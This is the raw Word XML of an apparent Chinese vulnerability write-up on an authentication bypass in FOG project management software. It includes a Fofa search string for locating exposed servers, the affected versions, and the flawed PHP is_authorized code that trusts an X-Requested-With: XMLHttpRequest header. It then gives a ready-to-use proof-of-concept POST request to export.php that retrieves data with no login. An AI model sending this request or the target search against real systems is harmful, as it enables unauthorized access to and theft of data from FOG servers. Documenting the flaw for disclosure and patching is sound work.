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6042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Fofa：icon_hash="-1952619005"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF77AC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560220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影响版本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603A588">
      <w:pP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&lt; 1.5.10.1693，&lt; 1.6.0-beta.2225</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF76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问题根因：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA8FC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请求头中包含X-Requested-With: XMLHttpRequest则认证为true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11554053">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD536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问题源码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9BB2D0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static function is_authorized($return_bool = false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D458BD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0FDB970F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$authorized = (self::$FOGUser &amp;&amp; self::$FOGUser-&gt;isValid()) || </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E64EC3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strtolower(($_SERVER['HTTP_X_REQUESTED_WITH'] ?? '')) == 'xmlhttprequest';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EE450A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($return_bool) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C48382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$authorized;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32014505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FA38E09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(!$authorized) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DED0BD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echo _('Unauthorized');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E7A32F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exit;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A1A2A3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A6E5D1B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B8BF2E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体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</w:p>
    <w:p w14:paraId="450D1BAC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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>POST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/fog/management/export.php?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HistoryReport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type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pdf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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684BE2EC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</w:p>
    <w:p w14:paraId="37450292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X-Requested-With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XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6302E2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en-US,en;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0659581F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application/json,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text/javascript,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*/*;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q=0.01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1921E1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Content-Type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6A5B6D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>application/x-www-form-urlencoded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charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58919995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Chrome/139.0.0.0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Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A79B299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Origin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http://192.168.43.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D65A5DD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Referer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http://192.168.43.133/fog/management/index.php?node=report&amp;sub=file&amp;f=aGlzdG9yeSByZXBvcnQ%3D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B474B7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deflate,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br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61153458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keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520245EF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Content-Length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44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569A3F3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</w:p>
    <w:p w14:paraId="7C593A30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fogguiuser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fogguipass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nojson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4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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EEE6C0">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="2218055"/>
            <wp:effectExtent l="0" t="0" r="1333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D7DD9"/>
    <w:p w14:paraId="4DC16DFA"/>
    <w:p w14:paraId="3D027C43"/>
    <w:p w14:paraId="33B74D12"/>
    <w:p w14:paraId="143FA32F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E050CC"/>
    <w:rsid w:val="1D7160DC"/>
    <w:rsid w:val="5ED30D15"/>
    <w:rsid w:val="61416E26"/>
    <w:rsid w:val="6D83283D"/>
    <w:rsid w:val="7D37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character" w:customStyle="1" w:styleId="7">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="5"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0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109</Words>
  <Characters>974</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>25</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1128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2025-11-06T07:47:00Z</dcterms:created>
  <dc:creator>xsy</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:36:00Z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6AB9DC7ED2344D42B685B734B9C24F61_12</vt:lpwstr>
  </property>
</Properties>
</file>